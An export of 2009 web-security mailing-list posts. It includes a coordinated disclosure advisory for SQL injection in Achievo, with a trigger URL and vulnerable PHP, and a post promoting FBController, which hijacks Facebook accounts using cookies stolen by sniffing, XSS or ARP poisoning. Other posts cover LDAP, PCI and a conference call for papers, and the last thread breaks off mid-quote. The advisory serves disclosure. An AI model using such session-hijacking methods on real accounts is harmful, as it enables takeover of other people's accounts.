&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://www.bonsai-sec.com/research/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.bonsai-sec.com/research/&lt;/a&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;SQL Injection in Achievo
&lt;br&gt;&lt;br&gt;&lt;br&gt;1. *Advisory Information*
&lt;br&gt;&lt;br&gt;Title: SQL Injection in Achievo
&lt;br&gt;Advisory ID: BONSAI-2009-0102
&lt;br&gt;Advisory URL: &lt;a href=&quot;http://www.bonsai-sec.com/research/vulnerabilities/achievo-sql-injection-0102.txt&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.bonsai-sec.com/research/vulnerabilities/achievo-sql-injection-0102.txt&lt;/a&gt;&lt;br&gt;Date published: 2009-10-13
&lt;br&gt;Vendors contacted: Achievo
&lt;br&gt;Release mode: Coordinated release
&lt;br&gt;&lt;br&gt;&lt;br&gt;2. *Vulnerability Information*
&lt;br&gt;&lt;br&gt;Class: SQL Injection
&lt;br&gt;Remotely Exploitable: Yes
&lt;br&gt;Locally Exploitable: Yes
&lt;br&gt;CVE Name: CVE-2009-2734
&lt;br&gt;&lt;br&gt;&lt;br&gt;3. *Software Description*
&lt;br&gt;&lt;br&gt;Achievo is a flexible web-based resource management tool for business
&lt;br&gt;environments. Achievo's resource management capabilities will enable
&lt;br&gt;organizations to support their business processes in a simple, but effective
&lt;br&gt;manner [0].
&lt;br&gt;&lt;br&gt;&lt;br&gt;4. *Vulnerability Description*
&lt;br&gt;&lt;br&gt;SQL injection is a code injection technique that exploits a security
&lt;br&gt;vulnerability occurring in the database layer of an application. The
&lt;br&gt;vulnerability is present when user input is either incorrectly filtered for
&lt;br&gt;string literal escape characters embedded in SQL statements or user input
&lt;br&gt;is not strongly typed and thereby unexpectedly executed.
&lt;br&gt;&lt;br&gt;For additional information, please look at the references [1] and [2].
&lt;br&gt;&lt;br&gt;&lt;br&gt;5. *Vulnerable packages*
&lt;br&gt;&lt;br&gt;Version &amp;lt;= 1.3.4
&lt;br&gt;&lt;br&gt;&lt;br&gt;6. *Non-vulnerable packages*
&lt;br&gt;&lt;br&gt;Achievo developers informed us that all users should upgrade to the latest
&lt;br&gt;version of Achievo, which fixes this vulnerability. More information to be
&lt;br&gt;found here:
&lt;br&gt;&amp;nbsp; &amp;nbsp; &lt;a href=&quot;http://www.achievo.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.achievo.org/&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;7. *Credits*
&lt;br&gt;&lt;br&gt;This vulnerability was discovered by Ryan Dewhurst ( ryan -at- bonsai-sec.com ).
&lt;br&gt;&lt;br&gt;&lt;br&gt;8. *Technical Description*
&lt;br&gt;&lt;br&gt;A SQL injection vulnerability was found in the dispatch.php script, more
&lt;br&gt;specifically in the $user_id variable. The vulnerability can be triggered by
&lt;br&gt;logging into Achievo and browsing to:
&lt;br&gt;&lt;br&gt;/dispatch.php?atknodetype=reports.weekreport&amp;atkaction=report&amp;nameswitch=name&amp;userid=%27&amp;functionlevelswitch=all&amp;startdate[day]=6&amp;startdate[month]=7&amp;startdate[year]=2009&amp;enddate[day]=17&amp;enddate[month]=7&amp;enddate[year]=2009&amp;showstatus=all&amp;outputType=0&amp;atkorderby=period
&lt;br&gt;&lt;br&gt;Which will generate a syntax error in the database. The following is
&lt;br&gt;the corresponding piece of code:
&lt;br&gt;&lt;br&gt;classweekreport.inc:128-134
&lt;br&gt;function get_employee($user_id)
&lt;br&gt;{
&lt;br&gt;&amp;nbsp; &amp;nbsp; $db = &amp;atkGetDb();
&lt;br&gt;&amp;nbsp; &amp;nbsp; $sql = &amp;quot;SELECT * FROM person WHERE status='active' AND id='$user_id'&amp;quot;;
&lt;br&gt;&amp;nbsp; &amp;nbsp; $record = $db-&amp;gt;getrows($sql);
&lt;br&gt;&amp;nbsp; &amp;nbsp; return $record[0];
&lt;br&gt;}
&lt;br&gt;&lt;br&gt;&lt;br&gt;9. *Report Timeline*
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; - 2009-07-09:
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Vulnerabilities were identified.
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; - 2009-08-08:
&lt;br&gt;&amp;nbsp; &amp;nbsp; Vendor contacted.
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; - 2009-08-12:
&lt;br&gt;&amp;nbsp; &amp;nbsp; Vendor confirmed vulnerabilities.
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; - 2009-08-14:
&lt;br&gt;&amp;nbsp; &amp;nbsp; Vendor sets possible release date of fixed version to Monday 12 Oct.
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; - 2009-10-12:
&lt;br&gt;&amp;nbsp; &amp;nbsp; Vendor released fixed version.
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; - 2009-10-13:
&lt;br&gt;&amp;nbsp; &amp;nbsp; The advisory BONSAI-2009-0101 is published.
&lt;br&gt;&lt;br&gt;&lt;br&gt;10. *References*
&lt;br&gt;&lt;br&gt;[0] &lt;a href=&quot;http://www.achievo.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.achievo.org/&lt;/a&gt;&lt;br&gt;[1] &lt;a href=&quot;http://www.owasp.org/index.php/SQL_injection&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.owasp.org/index.php/SQL_injection&lt;/a&gt;&lt;br&gt;[2] &lt;a href=&quot;http://en.wikipedia.org/wiki/SQL_injection&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://en.wikipedia.org/wiki/SQL_injection&lt;/a&gt;&lt;br&gt;&lt;br&gt;11. *About Bonsai*
&lt;br&gt;&lt;br&gt;Bonsai is a company involved in providing professional computer
&lt;br&gt;information security services.
&lt;br&gt;Currently a sound growth company, since its foundation in early 2009
&lt;br&gt;in Buenos Aires, Argentina,
&lt;br&gt;we are fully committed to quality service, and focused on our
&lt;br&gt;customers' real needs.
&lt;br&gt;&lt;br&gt;&lt;br&gt;12. *Disclaimer*
&lt;br&gt;&lt;br&gt;The contents of this advisory are copyright (c) 2009 Bonsai
&lt;br&gt;Information Security, and may be
&lt;br&gt;distributed freely provided that no fee is charged for this
&lt;br&gt;distribution and proper credit is
&lt;br&gt;given.
&lt;br&gt;&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/-BONSAI--SQL-Injection-in-Achievo-tp25933106p25933106.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-25813515</id>
	<title>WASC Announcement: Announcing the Web Application Security Scanner Evaluation Criteria v1</title>
	<published>2009-10-08T11:08:35Z</published>
	<updated>2009-10-08T11:08:35Z</updated>
	<author>
		<name>announcements-3</name>
	</author>
	<content type="html">&lt;br&gt;&lt;br&gt;The Web Application Security Consortium is pleased to announce the release
&lt;br&gt;of version 1 of the Web Application Security Scanner Evaluation Criteria
&lt;br&gt;(WASSEC). &amp;nbsp;The goal of the WASSEC project is to create a vendor-neutral
&lt;br&gt;document to help guide information security professionals during web
&lt;br&gt;application scanner evaluations. &amp;nbsp;The document provides a comprehensive list
&lt;br&gt;of features that should be considered when conducting an evaluation. &amp;nbsp;The
&lt;br&gt;WASSEC project does not promote any specific products or tools, but instead
&lt;br&gt;provides valuable information to help you make your own decision about which
&lt;br&gt;of these tools best meets your needs.
&lt;br&gt;&amp;nbsp;
&lt;br&gt;The WASSEC document be found here in both wiki and PDF formats: 
&lt;br&gt;&lt;a href=&quot;http://projects.webappsec.org/Web-Application-Security-Scanner-Evaluation-Cr&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://projects.webappsec.org/Web-Application-Security-Scanner-Evaluation-Cr&lt;/a&gt;&lt;br&gt;iteria
&lt;br&gt;&amp;nbsp;
&lt;br&gt;A large group of volunteers have contributed their expertise to the WASSEC
&lt;br&gt;project. &amp;nbsp;If you have questions or would like to contribute to future
&lt;br&gt;enhancements of the WASSEC, you can the project leader, Brian Shura, at
&lt;br&gt;&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=25813515&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;bshura73@...&lt;/a&gt;. 
&lt;br&gt;&lt;br&gt;Regards,
&lt;br&gt;- WASC Announcements
&lt;br&gt;&lt;br&gt;----------------------------------------------------------------------------
&lt;br&gt;Join us on IRC: irc.freenode.net #webappsec
&lt;br&gt;&lt;br&gt;Have a question? Search The Web Security Mailing List Archives: 
&lt;br&gt;&lt;a href=&quot;http://www.webappsec.org/lists/websecurity/archive/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.webappsec.org/lists/websecurity/archive/&lt;/a&gt;&lt;br&gt;&lt;br&gt;Subscribe via RSS: 
&lt;br&gt;&lt;a href=&quot;http://www.webappsec.org/rss/websecurity.rss&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.webappsec.org/rss/websecurity.rss&lt;/a&gt;&amp;nbsp;[RSS Feed]
&lt;br&gt;&lt;br&gt;Join WASC on LinkedIn
&lt;br&gt;&lt;a href=&quot;http://www.linkedin.com/e/gis/83336/4B20E4374DBA&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.linkedin.com/e/gis/83336/4B20E4374DBA&lt;/a&gt;&lt;br&gt;&amp;nbsp;
&lt;br&gt;&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/WASC-Announcement%3A-Announcing-the-Web-Application-Security-Scanner-Evaluation-Criteria-v1-tp25813515p25813515.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-25465775</id>
	<title>FBController - (Facebook Control Utility) version 2.0</title>
	<published>2009-09-15T10:03:45Z</published>
	<updated>2009-09-15T10:03:45Z</updated>
	<author>
		<name>QUAKER DOOMER</name>
	</author>
	<content type="html">FBController - The Ultimate Utility to Control Facebook accounts without the 
&lt;br&gt;Password.
&lt;br&gt;&lt;br&gt;Let me clear this again like last time that this utility WON'T hack/crack Facebook accounts.
&lt;br&gt;The utility will need biscuits/cookies instead of the password.
&lt;br&gt;&lt;br&gt;Get the target's cookie by sniffing, XSS, social engineering, ARP Poison-Sniffing, 
&lt;br&gt;scroogle search, anyhow !
&lt;br&gt;Once you have the cookies you can use FBController and have Full control over the 
&lt;br&gt;target's Facebook account.
&lt;br&gt;&lt;br&gt;==============================================================
&lt;br&gt;&lt;br&gt;==========================
&lt;br&gt;Changes in version FBController 2.0
&lt;br&gt;==========================
&lt;br&gt;&lt;br&gt;- You don't have to provide each and every cookie variable in the command parameter.
&lt;br&gt;Just save your cookie into a file and point FBC towards it.
&lt;br&gt;&lt;br&gt;- Many changes have taken place over the time in the FB UI and the Cookie structure as explained 
&lt;br&gt;on the blog.
&lt;br&gt;&lt;br&gt;- FBConTroller v2.0 now has a menu based Operation making it easier to control.
&lt;br&gt;&lt;br&gt;- FBConTroller as of now can Write onto one's own wall, other's walls, Retrieve Profile Page,
&lt;br&gt;Retrieve Friends List and even attempts to Retrieve Inbox and Send Messages.
&lt;br&gt;&lt;br&gt;&lt;br&gt;Happy Controlling ! :-)
&lt;br&gt;==============================================================
&lt;br&gt;&lt;br&gt;Download :
&lt;br&gt;&lt;a href=&quot;http://my.opera.com/quakerdoomer/blog/2009/09/15/fbcontroller-facebook-controller-v2&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://my.opera.com/quakerdoomer/blog/2009/09/15/fbcontroller-facebook-controller-v2&lt;/a&gt;&lt;br&gt;&lt;br&gt;The Latest available release is FBCONTROLLER version 2.0
&lt;br&gt;Coded by : Azim Poonawala (QUAKERDOOMER)
&lt;br&gt;available on
&lt;br&gt;Author's website : &lt;a href=&quot;http://solidmecca.co.nr&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://solidmecca.co.nr&lt;/a&gt;&amp;nbsp;[ Under Left Side of the Page/Tools]
&lt;br&gt;&lt;br&gt;Regards,
&lt;br&gt;QUAKERDOOMER
&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/FBController---%28Facebook-Control-Utility%29-version-2.0-tp25465775p25465775.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-25465718</id>
	<title>Re: How to enable LDAP signing on client side</title>
	<published>2009-09-15T08:48:57Z</published>
	<updated>2009-09-15T08:48:57Z</updated>
	<author>
		<name>Pete Jansson-2</name>
	</author>
	<content type="html">On Sep 14, 2009, at 7:21 AM, Jianrong Yu &amp;lt;&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=25465718&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;yuj@...&lt;/a&gt;&amp;gt; wrote:
&lt;br&gt;&lt;br&gt;&amp;gt; How to enable LDAP signing on client side?
&lt;br&gt;&lt;br&gt;The goal of having the server sign LDAP results would be to give &amp;nbsp;
&lt;br&gt;confidence in the integrity if the answers. I don't understand what &amp;nbsp;
&lt;br&gt;the goal of having clients sign queries would be. If you use SSL, the &amp;nbsp;
&lt;br&gt;client-server exchange is kept confidential (subject to some &amp;nbsp;
&lt;br&gt;assumptions) and client-side certificates can be used by the server to &amp;nbsp;
&lt;br&gt;provide access control so rogue clients can't make requests. 
&lt;br&gt;&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/How-to-enable-LDAP-signing-on-client-side-tp25452090p25465718.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-25452090</id>
	<title>How to enable LDAP signing on client side</title>
	<published>2009-09-14T07:21:56Z</published>
	<updated>2009-09-14T07:21:56Z</updated>
	<author>
		<name>Jianrong Yu-2</name>
	</author>
	<content type="html">Hi All,
&lt;br&gt;&lt;br&gt;The link &amp;lt;&lt;a href=&quot;http://support.microsoft.com/kb/935834&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://support.microsoft.com/kb/935834&lt;/a&gt;&amp;gt; is the step the How to 
&lt;br&gt;enable LDAP signing in Windows Server 2008.
&lt;br&gt;&lt;br&gt;How to enable LDAP signing on client side?
&lt;br&gt;&lt;br&gt;Thanks,
&lt;br&gt;&lt;br&gt;Jianrong Yu
&lt;br&gt;Systems Operation
&lt;br&gt;Office of Information technology
&lt;br&gt;Ohio University
&lt;br&gt;&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/How-to-enable-LDAP-signing-on-client-side-tp25452090p25452090.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-25431052</id>
	<title>nullcon Goa 2010 Call For Papers</title>
	<published>2009-09-12T23:40:48Z</published>
	<updated>2009-09-12T23:40:48Z</updated>
	<author>
		<name>nullcon nullcon</name>
	</author>
	<content type="html">Calling all greyhats, whitehats, blackhats, rainbowhats, nohats,
&lt;br&gt;underground, aboveground, in-the-sky, on-the-moon, Grannies,
&lt;br&gt;Grandpas, martians, Doodhwalas, Kaamwalis, Bai, Bhai, Chuck norris Fans,
&lt;br&gt;Mithun Da Fans, Himesh Reshamiya wannabees……..
&lt;br&gt;&lt;br&gt;Call For Paper is officially open for nullcon Goa 2010. It is time for
&lt;br&gt;you to polish your paper, stick up an abstract and send it across.
&lt;br&gt;A live demo/exploit/0day with the presentation might win you
&lt;br&gt;some extra brownies.
&lt;br&gt;&lt;br&gt;WEBSITE
&lt;br&gt;_______
&lt;br&gt;&lt;a href=&quot;http://nullcon.net&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://nullcon.net&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;About null
&lt;br&gt;________
&lt;br&gt;null – The open security community (&lt;a href=&quot;http://null.co.in&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://null.co.in&lt;/a&gt;) , a non-profit
&lt;br&gt;initiative,
&lt;br&gt;is a community of security professionals who have passion for security
&lt;br&gt;research and contribute towards research and development, knowledge sharing
&lt;br&gt;in the field of computer security.
&lt;br&gt;&lt;br&gt;nullcon Goa 2010 is our First effort towards organizing an
&lt;br&gt;International Hack Fest
&lt;br&gt;and is totally a community driven effort by the members of null community.
&lt;br&gt;&lt;br&gt;&lt;br&gt;TRACKS
&lt;br&gt;_______
&lt;br&gt;The conference will run on the following two serial tracks:
&lt;br&gt;1) Gurukul Track – 1 hr sessions
&lt;br&gt;2) Turbo Track – 10/15/20 min sessions
&lt;br&gt;&lt;br&gt;Don’t have a full fledged 1 hr paper ??? Don’t be disheartened, we
&lt;br&gt;have the Turbo Track with 10-20 minute talks.
&lt;br&gt;If you have a neat hack/0day/idea/Research in Progress, simply submit on
&lt;br&gt;the turbo track.
&lt;br&gt;&lt;br&gt;TOPICS
&lt;br&gt;______
&lt;br&gt;Topic could be anything from Auto meter crooking, hacking cars to
&lt;br&gt;hacking mobile networks, anything that would make people standup and
&lt;br&gt;take notice.
&lt;br&gt;&lt;br&gt;A subset of topics we would be interested in (but not
&lt;br&gt;limited to): Application security, Web security, social engineering,
&lt;br&gt;Mobile Networks GSM/CDMA/3G, Bluetooth, OS/Kernel, Virtualization,
&lt;br&gt;cloud security/hacking, protocol vulnerabilities, hardware security,
&lt;br&gt;cyber warfare, cyber forensics, cryptography, spam, malware, L2-L4
&lt;br&gt;hacking.
&lt;br&gt;&lt;br&gt;SUBMISSIONS
&lt;br&gt;____________
&lt;br&gt;Initially an abstract will be required with your details.
&lt;br&gt;Send an email to (cfp _at_ nullcon.net) in the following format:
&lt;br&gt;Subject should be: nullcon Goa 2010 CFP &amp;lt;Paper Title&amp;gt;
&lt;br&gt;&lt;br&gt;Track: Gurukul / Turbo
&lt;br&gt;Name:
&lt;br&gt;Handle:
&lt;br&gt;Nationality:
&lt;br&gt;Organization:
&lt;br&gt;Email:
&lt;br&gt;Contact no:
&lt;br&gt;Paper Abstract: (Max 6000 words)
&lt;br&gt;Have You Presented this paper at any another conference? If Yes, Where?
&lt;br&gt;Why do you think your work is innovative or different?
&lt;br&gt;&lt;br&gt;NOTE: It is mandatory for the participants, whose papers are selected, to send
&lt;br&gt;us the final presentation (ppt, odp format) and the full paper (doc, pdf format)
&lt;br&gt;containing the detailed explanation of presentation, within the
&lt;br&gt;stipulated time (as mentioned below). The abstract should clearly
&lt;br&gt;define your findings in detail with factual information. Just stating that
&lt;br&gt;‘it works’ may not help us understand your work correctly.
&lt;br&gt;&lt;br&gt;&lt;br&gt;IMPORTANT DEADLINES
&lt;br&gt;____________________
&lt;br&gt;CFP Closes – 15th Dec 2009
&lt;br&gt;Selection Notification – 25th Dec 2009
&lt;br&gt;Submission of final Paper and presentation material – 5th Jan 2010.
&lt;br&gt;&lt;br&gt;&lt;br&gt;SPEAKER PRIVILEGES FOR GURUKUL TRACK
&lt;br&gt;______________________________________
&lt;br&gt;Free accommodation.
&lt;br&gt;Fixed amount of reimbursement for travel (TBD).
&lt;br&gt;Invitation to the post conference party.
&lt;br&gt;Free access to the conference.
&lt;br&gt;&lt;br&gt;&lt;br&gt;SPEAKER PRIVILEGES FOR TURBO TRACK
&lt;br&gt;___________________________________
&lt;br&gt;Speaker privileges for Gurukul track will not be extended to Turbo
&lt;br&gt;track; however heavy discounts on entry fee will be provided.
&lt;br&gt;&lt;br&gt;Regards,
&lt;br&gt;null Team
&lt;br&gt;&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/nullcon-Goa-2010-Call-For-Papers-tp25431052p25431052.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-25380915</id>
	<title>Running ratproxy from windows command prompt without installing cygwin</title>
	<published>2009-09-10T03:34:36Z</published>
	<updated>2009-09-10T03:34:36Z</updated>
	<author>
		<name>dec123</name>
	</author>
	<content type="html">Hi,
&lt;br&gt;Can anybody tell me how to run ratproxy from windows comand prompt,without installing cygwin.</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Running-ratproxy-from-windows-command-prompt-without-installing-cygwin-tp25380915p25380915.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-25376872</id>
	<title>Re: Web 2.0 support group</title>
	<published>2009-09-09T13:11:20Z</published>
	<updated>2009-09-09T13:11:20Z</updated>
	<author>
		<name>Catherine Pagliaro</name>
	</author>
	<content type="html">The Payment Card Industry Security Standards and Payment Application Data
&lt;br&gt;Security Standards attempt to get programmers to code securely. I
&lt;br&gt;underline attempt. &amp;nbsp;We as payment application developers must follow
&lt;br&gt;owasp.org standards and common sense security best business practises for
&lt;br&gt;developing any type of code, hardening servers and locking down network
&lt;br&gt;systems,as well as assuring our physical environments are locked down to
&lt;br&gt;maintain our PCI DSS compliance. &amp;nbsp;As we do these types of assessments it
&lt;br&gt;is frightening the lack of education and training on all aspects of
&lt;br&gt;physical and IT application development and hosting security. &amp;nbsp;Education,
&lt;br&gt;training and attention to security best business practises for all types
&lt;br&gt;of software and languages is necessary to minimize the rising criminal
&lt;br&gt;activity. &amp;nbsp;PCI DSS and the other security requirements for doing business
&lt;br&gt;online is just the first small step to getting all applications coded
&lt;br&gt;securely to avoid data loss, fraud and identity theft. &amp;nbsp;We also need a
&lt;br&gt;committment from all application developers to code securely...as we have
&lt;br&gt;a committment from security professionals, law enforcement, the card
&lt;br&gt;associations and payment service providers and acuirting facilities to
&lt;br&gt;make this happen...Go to the PCI Security Standards website - you can
&lt;br&gt;google it...it is a first start at getting our industry standardized for
&lt;br&gt;coding securely....
&lt;br&gt;&lt;br&gt;&lt;div class='shrinkable-quote'&gt;&lt;br&gt;&amp;gt; Steven M. Christey wrote:
&lt;br&gt;&amp;gt;&amp;gt; So I've been an observer of the &amp;quot;Web 2.0 is a security nightmare&amp;quot; camp
&lt;br&gt;&amp;gt;&amp;gt; with the occasional head nods and detached agreement, being enough of a
&lt;br&gt;&amp;gt;&amp;gt; generalist that I didn't have anything to add to the alarms raised by
&lt;br&gt;&amp;gt;&amp;gt; the
&lt;br&gt;&amp;gt;&amp;gt; specialists. &amp;nbsp;Where is the support group for those who have recently
&lt;br&gt;&amp;gt;&amp;gt; realized just how desperate the situation is?
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; I'm not being entirely facetious. &amp;nbsp;Is there any hope at all?
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; - Steve
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; 1. No, but there is no hope for generalized security apart from &amp;quot;Web
&lt;br&gt;&amp;gt; 2.0&amp;quot; either. &amp;nbsp;There is only risk reduction.
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; 2. Stop complaining about Web 2.0. &amp;nbsp;Really. &amp;nbsp;It doesn't exist. &amp;nbsp;There
&lt;br&gt;&amp;gt; are security problems specific to JSON, AJAX, REST, SOAP, FLEX, social
&lt;br&gt;&amp;gt; networking, P2P, etc. &amp;nbsp;If you want to actually discuss the risk, name
&lt;br&gt;&amp;gt; the risk you're interested in. &amp;nbsp;Web 2.0 doesn't mean anything we can
&lt;br&gt;&amp;gt; discuss like rational people. &amp;nbsp;Same goes for &amp;quot;the Cloud&amp;quot;.
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; Steve
&lt;br&gt;&amp;gt; --
&lt;br&gt;&amp;gt; &amp;nbsp; | Steven E. Pinkham &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;gt; &amp;nbsp; | Security Researcher, Maven Security &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;gt; &amp;nbsp; | &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=25376872&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;steve.pinkham@...&lt;/a&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;gt; &amp;nbsp; | GPG public key ID CD31CAFB &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt;
&lt;/div&gt;&lt;br&gt;&lt;br&gt;Catherine Pagliaro, B.B.A.,
&lt;br&gt;CEO, C.N. Wylie Group Inc.
&lt;br&gt;703 - 889 West Pender, Vancouver, BC V6C3B2
&lt;br&gt;#13 - 465 King Street East, Toronto, On, M5A1L6
&lt;br&gt;Tel: 1 800 811-7811
&lt;br&gt;Toronto
&lt;br&gt;Tel: 905 910-0575
&lt;br&gt;www.cnwylie.com
&lt;br&gt;PRIVILEGE AND CONFIDENTIALITY NOTICE This electronic transmission,
&lt;br&gt;including all attachments, is directed in confidence solely to the
&lt;br&gt;person(s) to which it is addressed, or an authorized recipient, and may
&lt;br&gt;not otherwise be distributed, copied, printed or disclosed. &amp;nbsp;If you have
&lt;br&gt;received this electronic transmission in error, please notify the sender
&lt;br&gt;immediately by return electronic transmission and then immediately delete
&lt;br&gt;this
&lt;br&gt;transmission, including all attachments, without copying, printing,
&lt;br&gt;distributing or disclosing same. Thank you.
&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Web-2.0-support-group-tp25359772p25376872.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-25376669</id>
	<title>RE: Securing password between webserver &amp; appserver.</title>
	<published>2009-09-09T11:14:39Z</published>
	<updated>2009-09-09T11:14:39Z</updated>
	<author>
		<name>Calderon, Juan Carlos (GE, Corporate, consultant)</name>
	</author>
	<content type="html">Don that is an interesting suggestion
&lt;br&gt;&lt;br&gt;Do you have more specific information, since I only know that SSL/IPSec
&lt;br&gt;can be end-to-end in a per link basis, but the idea of a real End-to-End
&lt;br&gt;encryption using SSL, that is the case of Chintan is interesting. 
&lt;br&gt;&lt;br&gt;Any link or whitepaper on how to do this in Tomcat as you mention?
&lt;br&gt;&lt;br&gt;Regards,
&lt;br&gt;Juan Carlos
&lt;br&gt;&lt;br&gt;-----Original Message-----
&lt;br&gt;From: &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=25376669&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;listbounce@...&lt;/a&gt; [mailto:&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=25376669&amp;i=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;listbounce@...&lt;/a&gt;]
&lt;br&gt;On Behalf Of bigbert007
&lt;br&gt;Sent: Martes, 08 de Septiembre de 2009 10:34 p.m.
&lt;br&gt;To: &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=25376669&amp;i=2&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;webappsec@...&lt;/a&gt;
&lt;br&gt;Subject: Re: Securing password between webserver &amp; appserver.
&lt;br&gt;&lt;br&gt;Till - great recommendation, I'll expand on it.
&lt;br&gt;&lt;br&gt;Depending on the back end app server, there is usually a mechanism in 
&lt;br&gt;place for creating a trust between the web server and appserver and then
&lt;br&gt;&lt;br&gt;encrypting that connection with SSL. &amp;nbsp;When credentials are entered the 
&lt;br&gt;entire pipe is encrypted from the client &amp;gt; webserver &amp;gt; app server based 
&lt;br&gt;upon that trust relationship and SSL- encrypted connection
&lt;br&gt;&lt;br&gt;Websphere has this option available as does Tomcat. &amp;nbsp;I suspect that 
&lt;br&gt;Coldfusion and other app servers have something similar.
&lt;br&gt;&lt;br&gt;Good luck.
&lt;br&gt;&lt;br&gt;Don
&lt;br&gt;&lt;br&gt;Till Elsner wrote:
&lt;div class='shrinkable-quote'&gt;&lt;br&gt;&amp;gt; What about securing (i.e. encrypting) the connection between web 
&lt;br&gt;&amp;gt; server and app server itself, like connecting to the app server from 
&lt;br&gt;&amp;gt; the web server via a SSH-forwarded local port? You could keep the 
&lt;br&gt;&amp;gt; original authentication method and have the entire communication 
&lt;br&gt;&amp;gt; encrypted anyway.
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; Greetings
&lt;br&gt;&amp;gt; Till
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; Am 07.09.2009 um 08:04 schrieb Chintan Oza:
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; Dear All,
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; We have a web application which perform user authentication on
&lt;br&gt;&amp;gt;&amp;gt; id+password basis.
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; The architecture is like this.
&lt;br&gt;&amp;gt;&amp;gt; Browser&amp;lt;-HTTPS-&amp;gt;WebServer&amp;lt;--&amp;gt;AppServer
&lt;br&gt;&amp;gt;&amp;gt;
